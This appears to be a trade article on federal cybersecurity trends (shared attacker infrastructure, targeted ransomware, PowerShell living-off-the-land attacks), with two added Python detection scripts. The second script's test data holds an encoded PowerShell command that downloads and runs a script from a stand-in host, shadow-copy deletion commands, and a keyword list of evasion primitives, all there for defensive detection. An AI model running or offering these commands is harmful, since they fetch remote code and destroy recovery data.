Federal agencies that use up-to-date threat intelligence and convert it into concrete mitigations will be better placed to develop the policies, tools, and integrated strategies needed to counter the latest cyber threats.
FREMONT, CA: As more of daily life moves into digital space, protecting data becomes more crucial. The departments and agencies of the United States government have evolved over time to address modern problems and meet the day-to-day needs of citizens. The federal government comprises over 430 departments, agencies, and sub-agencies, with millions of workers and devices. Because centralized management and control systems tend to be scoped to a single agency and a specific set of solutions, collaboration across agencies quickly becomes a challenge. The lack of a single management solution not only reduces visibility; it also means the security posture of an interconnected cross-agency system is only as strong as the weakest link in the chain.
Although maintaining consistent cybersecurity across the federal government is a daunting task, it can succeed if efforts are informed by a common set of data derived from current attack tactics. With that data, agencies know where to strengthen their networks and which controls to prioritize in modernization initiatives. Here are three important emerging trends that agencies should keep in mind.
Public Infrastructure and Threats
Roughly 60 percent of threats share at least one common public infrastructure element, and threats that share infrastructure tend to use those resources at the same stage of the kill chain. With this information, IT teams can actively search for, and block or monitor, traffic to or from these common domains. Careful observation of this pattern can also reveal how similar attacks operate and show agencies how related classes of threats evolve.
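As an added example (not code from the original article), the following Python script shows the correlation described above on constructed data: it finds infrastructure elements shared by two or more threat reports, checks whether each shared element is used at the same kill-chain stage by every threat that uses it, and then matches constructed proxy log lines against those shared indicators. The threat records, the placeholder domains, and the proxy log layout are all assumptions made for illustration.

```python
"""Find public infrastructure shared across threat reports and flag outbound
traffic to it. Added example, not code from the original article; the threat
records, domains and proxy log lines below are constructed for illustration."""
from collections import defaultdict

# Constructed threat-intelligence records: (threat, kill-chain stage, indicator).
# Domains are placeholders under .example/.invalid, not real indicators.
THREAT_RECORDS = [
    ("ThreatA", "delivery", "cdn-update.example"),
    ("ThreatA", "command-and-control", "c2-relay.example"),
    ("ThreatB", "delivery", "cdn-update.example"),
    ("ThreatB", "command-and-control", "beacon.invalid"),
    ("ThreatC", "command-and-control", "c2-relay.example"),
    ("ThreatC", "exploitation", "exploit-kit.invalid"),
    ("ThreatD", "delivery", "unique-host.invalid"),
    ("ThreatE", "delivery", "c2-relay.example"),
]


def shared_infrastructure(records):
    """Map each indicator used by two or more distinct threats to its set of
    (threat, stage) uses. Indicators used by a single threat are dropped."""
    uses = defaultdict(set)
    for threat, stage, indicator in records:
        uses[indicator].add((threat, stage))
    return {ind: u for ind, u in uses.items() if len({t for t, _ in u}) >= 2}


def sharing_fraction(records):
    """Fraction of threats that share at least one indicator with another threat."""
    shared = shared_infrastructure(records)
    all_threats = {t for t, _, _ in records}
    sharing = {t for uses in shared.values() for t, _ in uses}
    return len(sharing) / len(all_threats)


def stage_consistency(records):
    """For each shared indicator, the single kill-chain stage at which every
    threat uses it, or None when the threats use it at different stages."""
    out = {}
    for ind, uses in shared_infrastructure(records).items():
        stages = {s for _, s in uses}
        out[ind] = stages.pop() if len(stages) == 1 else None
    return out


# Constructed proxy log: "<timestamp> <src_ip> <destination_host> <action>".
PROXY_LOG = """\
2019-07-01T10:00:01Z 10.1.2.3 www.agency-portal.invalid ALLOW
2019-07-01T10:00:05Z 10.1.2.3 cdn-update.example ALLOW
2019-07-01T10:00:09Z 10.1.2.7 files.c2-relay.example ALLOW
2019-07-01T10:00:12Z 10.1.2.9 exploit-kit.invalid ALLOW
"""


def host_matches(host, indicator):
    """True when host equals the indicator or is a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == indicator or host.endswith("." + indicator)


def flag_traffic(log_text, indicators):
    """Return (timestamp, src_ip, host, matched_indicator) for every proxy line
    whose destination is, or sits under, one of the watched indicators."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, host, _action = line.split()
        for ind in indicators:
            if host_matches(host, ind):
                hits.append((ts, src, host, ind))
                break
    return hits


if __name__ == "__main__":
    shared = shared_infrastructure(THREAT_RECORDS)
    print("shared indicators:", sorted(shared))
    print("fraction of threats sharing infrastructure:", sharing_fraction(THREAT_RECORDS))
    print("stage consistency:", stage_consistency(THREAT_RECORDS))
    for hit in flag_traffic(PROXY_LOG, shared):
        print("FLAG", hit)
```

On the constructed data, four of the five threats share infrastructure, the shared CDN host is used at the delivery stage by every threat that touches it, and two proxy lines are flagged (one by a subdomain match). Note that the shared set is a prioritization aid, not a complete blocklist: an indicator seen in only one report (exploit-kit.invalid here) is not flagged by this pass and still belongs on the normal indicator feed.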
Ransomware is becoming more targeted
During the first quarter of 2019, the criminals deploying LockerGoga ransomware used detailed reconnaissance to select victims in advance and evade detection. In the second quarter, the RobbinHood and Ryuk ransomware variants followed a similar strategy, targeting specific municipalities. RobbinHood also disables Windows services that would interfere with its file encryption and disconnects shared drives, while Ryuk uses advanced evasion tactics that include destroying its encryption key and deleting shadow copies from infected systems, which hinders recovery and leaves defenders with less evidence of its activity. Federal IT teams should secure ransomware entry points such as email and teach workers how to spot and respond to phishing emails and related tactics. Agencies need to perform regular data backups, scan them for malware, and store them off the network. Restoration drills should also be conducted to confirm that data can be restored completely and quickly.
Attackers "live off the land."
Living-off-the-land tactics abuse tools already installed on a system to deliver malicious payloads, escalate privileges, and install malware. The activity is hard to identify because it looks like legitimate use of trusted software. PowerShell, which comes pre-installed on Windows, is commonly used in these attacks: scripts can run entirely in memory, commands are easily obfuscated, and the binary itself is trusted, which lets it slip past controls such as application whitelisting. Although PowerShell is the highest-profile target for this attack type, other built-in tools are abused in the same way. This trend is one of the most important for federal agencies to track, especially given how much legacy IT they run. Federal IT teams should know which tools are present on the network, including those pre-installed on devices, bundled with application suites, or built into operating systems. They then need to implement dynamic trust policies and intent-based segmentation so that when a previously trusted tool behaves suspiciously it is immediately identified and moved to an isolated network segment until it is determined to be safe.
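As an added example that is not part of the original article, the following Python detection logic covers the two tactics described in this section and the ransomware section above: shadow-copy deletion of the kind attributed to Ryuk, and PowerShell launched with a hidden window, an encoded command, or in-memory download primitives, including decoding the -EncodedCommand payload so the actual script can be inspected rather than just the opaque base64 blob. The process-creation events and their pipe-delimited layout (timestamp|host|user|parent image|image|command line) are constructed for illustration and do not follow any real product's format; the isolation step (moving the host to a quarantined segment) is left to the network controls the paragraph describes.

```python
"""Flag living-off-the-land PowerShell use and shadow-copy deletion in
process-creation events. Added example, not code from the original article.
The event lines are constructed; the field layout
ts|host|user|parent_image|image|command_line is an assumption for this demo."""
import base64
import binascii
import ntpath

# Constructed payload for the encoded-command event. PowerShell's
# -EncodedCommand expects base64 of a UTF-16LE string, so build it that way.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2-relay.example/a.ps1')"
ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed events: two benign, one Office-spawned encoded PowerShell,
# two shadow-copy deletions (vssadmin and wmic variants).
EVENT_LOG = "\n".join([
    "2019-07-01T09:00:00Z|WS01|alice|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt",
    "2019-07-01T09:05:00Z|WS01|svc_inv|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\scripts\\inventory.ps1",
    f"2019-07-01T09:07:00Z|WS02|bob|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc {ENCODED}",
    "2019-07-01T09:09:00Z|WS02|bob|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    "2019-07-01T09:09:30Z|WS02|bob|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic.exe shadowcopy delete",
])

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings that mark in-memory execution, download cradles or evasion flags.
PS_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
               "-nop", "-w hidden", "bypass")


def parse_event(line):
    ts, host, user, parent, image, cmd = line.split("|", 5)
    return {"ts": ts, "host": host, "user": user, "parent": parent,
            "image": image, "cmd": cmd}


def decode_encoded_command(cmd):
    """Return the decoded script when cmd carries -EncodedCommand (or any
    prefix abbreviation PowerShell accepts, e.g. -e, -ec, -enc), else None."""
    tokens = cmd.split()
    for i in range(len(tokens) - 1):
        if tokens[i][0] not in "-/":
            continue
        flag = tokens[i].lower().lstrip("-/")
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def classify(event):
    """Return the sorted list of rule names that fire for one event."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmd = event["cmd"].lower()
    rules = []
    if (image == "vssadmin.exe" and "delete shadows" in cmd) or \
       (image == "wmic.exe" and "shadowcopy delete" in cmd):
        rules.append("shadow-copy-deletion")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(event["cmd"])
        if decoded is not None:
            rules.append("powershell-encoded-command")
        # Inspect the decoded script as well as the visible command line.
        haystack = cmd + " " + (decoded or "").lower()
        if any(k in haystack for k in PS_KEYWORDS):
            rules.append("powershell-suspicious-args")
        if parent in OFFICE_APPS:
            rules.append("office-spawned-powershell")
    return sorted(rules)


def detect(log_text):
    """Run every rule over the log and return one finding per matching event."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        rules = classify(ev)
        if rules:
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "image": ntpath.basename(ev["image"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in detect(EVENT_LOG):
        print(f["ts"], f["host"], f["user"], f["image"], ", ".join(f["rules"]))
```

Three of the five constructed events fire: the Office-spawned PowerShell hits all three PowerShell rules because the decoded payload exposes the download cradle that the base64 on the command line hides, and both shadow-copy deletions are caught regardless of which built-in tool was used. The administrator's `-File inventory.ps1` run stays clean, which is the point of keying on behaviour (parent process, encoding, in-memory primitives) rather than on the PowerShell binary itself.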
Cybersecurity has become a prime focus across the globe for governments, private citizens, and companies. As the government tries to gauge the breadth of the problem, the question of how best to manage threats and organize defenses arises. Presently there are cybersecurity divisions within various agencies, including the Federal Bureau of Investigation, the Department of Defense, the Department of Homeland Security, and intelligence organizations such as the CIA and the NSA.